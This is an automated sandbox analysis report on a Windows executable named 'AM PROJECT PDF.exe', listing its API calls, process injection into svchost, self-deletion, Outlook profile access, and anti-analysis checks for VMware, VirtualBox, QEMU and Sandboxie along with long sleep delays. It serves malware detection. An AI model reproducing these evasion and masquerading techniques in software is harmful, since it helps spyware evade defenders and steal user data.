Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004012A3 NtProtectVirtualMemory, 6_2_004012A3
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DEF7 NtCreateFile, 6_2_0041DEF7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DFA7 NtReadFile, 6_2_0041DFA7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041E021 NtClose, 6_2_0041E021
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004014E9 NtProtectVirtualMemory, 6_2_004014E9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DEF1 NtCreateFile, 6_2_0041DEF1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041DF49 NtCreateFile, 6_2_0041DF49
Source: AM PROJECT PDF.exe Binary or memory string: OriginalFilename vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.299387212.00000000007DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.305486469.0000000003451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMetal.dllJ vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.315751087.0000000006D50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.303350926.0000000002648000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.316811478.00000000070E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMetal.dllJ vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.300887127.0000000002451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.302322896.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.302322896.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.303201456.0000000002631000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000000.249674589.00000000001A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamexvVr.exe4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000000.00000002.315432245.0000000006C50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000002.428411713.000000000125F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000003.299833951.00000000010BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe, 00000006.00000003.295891725.0000000000F28000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe Binary or memory string: OriginalFilenamexvVr.exe4 vs AM PROJECT PDF.exe
Source: AM PROJECT PDF.exe ReversingLabs: Detection: 76%
Source: AM PROJECT PDF.exe Metadefender: Detection: 44%
Source: AM PROJECT PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe "C:\Users\user\Desktop\AM PROJECT PDF.exe"
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AM PROJECT PDF.exe.log
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\262I-Au
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@2/2
Source: AM PROJECT PDF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: AM PROJECT PDF.exe String found in binary or memory: Database-helpToolStripMenuItem1
Source: AM PROJECT PDF.exe String found in binary or memory: Options-helpToolStripMenuItem2Help7userManualToolStripMenuItem
Source: AM PROJECT PDF.exe String found in binary or memory: tab_addresses'addresses_container#addresses_quick_1/addresses_quick_title_1
Source: AM PROJECT PDF.exe String found in binary or memory: %options_showsplash%Show Splash Screen%options_loadontabs/Load only on tab switch+options_loadhwonstart;Load hardware data on startup'options_loadonstart1Load all data on startup+options_weights_group!options_filterby%options_filter_lbl
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: AM PROJECT PDF.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: AM PROJECT PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AM PROJECT PDF.exe, AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: AM PROJECT PDF.exe, MainWindow.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.AM PROJECT PDF.exe.b0000.0.unpack, MainWindow.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_02429888 push esp; ret 0_2_02429889
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011BD0D1 push ecx; ret 6_2_011BD0E4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041B152 push edi; iretd 6_2_0041B153
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041A124 push es; iretd 6_2_0041A141
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00421279 push eax; ret 6_2_0042127F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041A202 push es; iretd 6_2_0041A208
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0042122C push eax; ret 6_2_0042127F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004212E3 push eax; ret 6_2_004212E9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00421282 push eax; ret 6_2_004212E9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00422B3B push 0A05B974h; ret 6_2_00422BC6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040B404 push ecx; retf 6_2_0040B405
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004224C5 push edi; ret 6_2_004224D4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004054CD pushad ; ret 6_2_004054D9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040556E push ebp; retf 6_2_0040556F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004225D5 push ebx; ret 6_2_004225DB
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00421E04 push ds; iretd 6_2_00421E06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00409F74 push esp; ret 6_2_00409F7D
Source: initial sample Static PE information: section name: .text entropy: 6.846311012403682

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\svchost.exe File deleted: c:\users\user\desktop\am project pdf.exe
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AM PROJECT PDF.exe PID: 5088, type: MEMORYSTR
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe TID: 772 Thread sleep time: -41226s >= -30000s
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe TID: 676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01235BA5 rdtsc 6_2_01235BA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe API coverage: 7.7 %
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread delayed: delay time: 41226
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread delayed: delay time: 922337203685477
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II2VM Additions S3 Trio32/64
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QEMUTSOFTWARE\Oracle\VirtualBox Guest Additions
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.327111690.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000D.00000000.335831533.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 0000000D.00000000.400886087.00000000050A1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IdentifierDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
Source: explorer.exe, 0000000D.00000000.335831533.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01235BA5 rdtsc 6_2_01235BA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169100 mov eax, dword ptr fs:[00000030h] 6_2_01169100
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119513A mov eax, dword ptr fs:[00000030h] 6_2_0119513A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h] 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 mov ecx, dword ptr fs:[00000030h] 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118B944 mov eax, dword ptr fs:[00000030h] 6_2_0118B944
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116B171 mov eax, dword ptr fs:[00000030h] 6_2_0116B171
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C962 mov eax, dword ptr fs:[00000030h] 6_2_0116C962
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h] 6_2_012249A4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192990 mov eax, dword ptr fs:[00000030h] 6_2_01192990
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118C182 mov eax, dword ptr fs:[00000030h] 6_2_0118C182
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A185 mov eax, dword ptr fs:[00000030h] 6_2_0119A185
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h] 6_2_011E51BE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E69A6 mov eax, dword ptr fs:[00000030h] 6_2_011E69A6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011961A0 mov eax, dword ptr fs:[00000030h] 6_2_011961A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011F41E8 mov eax, dword ptr fs:[00000030h] 6_2_011F41E8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0116B1E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7016 mov eax, dword ptr fs:[00000030h] 6_2_011E7016
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h] 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h] 6_2_0119002D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01234015 mov eax, dword ptr fs:[00000030h] 6_2_01234015
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h] 6_2_0117B02A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01180050 mov eax, dword ptr fs:[00000030h] 6_2_01180050
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01222073 mov eax, dword ptr fs:[00000030h] 6_2_01222073
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01231074 mov eax, dword ptr fs:[00000030h] 6_2_01231074
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169080 mov eax, dword ptr fs:[00000030h] 6_2_01169080
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E3884 mov eax, dword ptr fs:[00000030h] 6_2_011E3884
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119F0BF mov ecx, dword ptr fs:[00000030h] 6_2_0119F0BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119F0BF mov eax, dword ptr fs:[00000030h] 6_2_0119F0BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A90AF mov eax, dword ptr fs:[00000030h] 6_2_011A90AF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h] 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov ecx, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011640E1 mov eax, dword ptr fs:[00000030h] 6_2_011640E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011658EC mov eax, dword ptr fs:[00000030h] 6_2_011658EC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122131B mov eax, dword ptr fs:[00000030h] 6_2_0122131B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116F358 mov eax, dword ptr fs:[00000030h] 6_2_0116F358
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116DB40 mov eax, dword ptr fs:[00000030h] 6_2_0116DB40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01193B7A mov eax, dword ptr fs:[00000030h] 6_2_01193B7A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116DB60 mov ecx, dword ptr fs:[00000030h] 6_2_0116DB60
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238B58 mov eax, dword ptr fs:[00000030h] 6_2_01238B58
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01235BA5 mov eax, dword ptr fs:[00000030h] 6_2_01235BA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119B390 mov eax, dword ptr fs:[00000030h] 6_2_0119B390
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192397 mov eax, dword ptr fs:[00000030h] 6_2_01192397
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01171B8F mov eax, dword ptr fs:[00000030h] 6_2_01171B8F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121D380 mov ecx, dword ptr fs:[00000030h] 6_2_0121D380
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122138A mov eax, dword ptr fs:[00000030h] 6_2_0122138A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194BAD mov eax, dword ptr fs:[00000030h] 6_2_01194BAD
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E53CA mov eax, dword ptr fs:[00000030h] 6_2_011E53CA
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0118DBE9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h] 6_2_011903E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116AA16 mov eax, dword ptr fs:[00000030h] 6_2_0116AA16
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01183A1C mov eax, dword ptr fs:[00000030h] 6_2_01183A1C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01165210 mov eax, dword ptr fs:[00000030h] 6_2_01165210
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01165210 mov ecx, dword ptr fs:[00000030h] 6_2_01165210
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01178A0A mov eax, dword ptr fs:[00000030h] 6_2_01178A0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122AA16 mov eax, dword ptr fs:[00000030h] 6_2_0122AA16
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A4A2C mov eax, dword ptr fs:[00000030h] 6_2_011A4A2C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238A62 mov eax, dword ptr fs:[00000030h] 6_2_01238A62
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121B260 mov eax, dword ptr fs:[00000030h] 6_2_0121B260
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011F4257 mov eax, dword ptr fs:[00000030h] 6_2_011F4257
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h] 6_2_01169240
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A927A mov eax, dword ptr fs:[00000030h] 6_2_011A927A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122EA55 mov eax, dword ptr fs:[00000030h] 6_2_0122EA55
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119D294 mov eax, dword ptr fs:[00000030h] 6_2_0119D294
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0117AAB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119FAB0 mov eax, dword ptr fs:[00000030h] 6_2_0119FAB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h] 6_2_011652A5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192ACB mov eax, dword ptr fs:[00000030h] 6_2_01192ACB
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192AE4 mov eax, dword ptr fs:[00000030h] 6_2_01192AE4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238D34 mov eax, dword ptr fs:[00000030h] 6_2_01238D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122E539 mov eax, dword ptr fs:[00000030h] 6_2_0122E539
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h] 6_2_01194D3B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h] 6_2_01194D3B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h] 6_2_01194D3B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116AD30 mov eax, dword ptr fs:[00000030h] 6_2_0116AD30
